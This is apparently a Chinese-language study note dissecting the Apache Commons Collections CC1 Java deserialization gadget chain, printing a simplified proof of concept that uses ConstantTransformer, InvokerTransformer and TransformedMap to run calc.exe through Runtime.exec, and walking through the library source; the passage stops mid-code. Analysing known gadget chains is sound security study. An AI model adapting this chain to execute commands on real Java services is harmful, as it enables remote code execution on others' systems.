cc1链(jdk6)
简化cc1-仿
使用p牛的简化cc1进行分析:
package ysoserial.payloads;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;
import java.util.HashMap;
import java.util.Map;
public class cc1 {
public static void main(String[] args) throws Exception {
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.getRuntime()),
new InvokerTransformer("exec", new Class[]{String.class},
new Object[]
{"C:\\Windows\\System32\\calc.exe"}),
};
Transformer transformerChain = new ChainedTransformer(transformers);
Map innerMap = new HashMap();
Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);
outerMap.put("test", "xxxx");
}
}
下断点进行debug:
一路f7发现漏洞点,excute确认漏洞所在
而此时的数据为字节流,于是反溯,可查看调用链:
TransformedMap.decorate用于把keyTransformer,valueTransformer定义进innerMap
Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);
keyTransformer,valueTransformer是继承了Transformer接口,用于处理新元素。
回到main中,定义了transformers
new Transformer[]{new ConstantTransformer(Runtime.getRuntime()),new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"C:\\Windows\\System32\\calc.exe"}),};
分别查看ConstantTransformer,InvokerTransformer。
ConstantTransformer的作用是构造函数时传入对象并在最后transform方法return这个对象。
InvokerTransformer的作用为rce源码如下:
public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) {
this.iMethodName = methodName;
this.iParamTypes = paramTypes;
this.iArgs = args;
}
public Object transform(Object input) {
if (input == null) {
return nul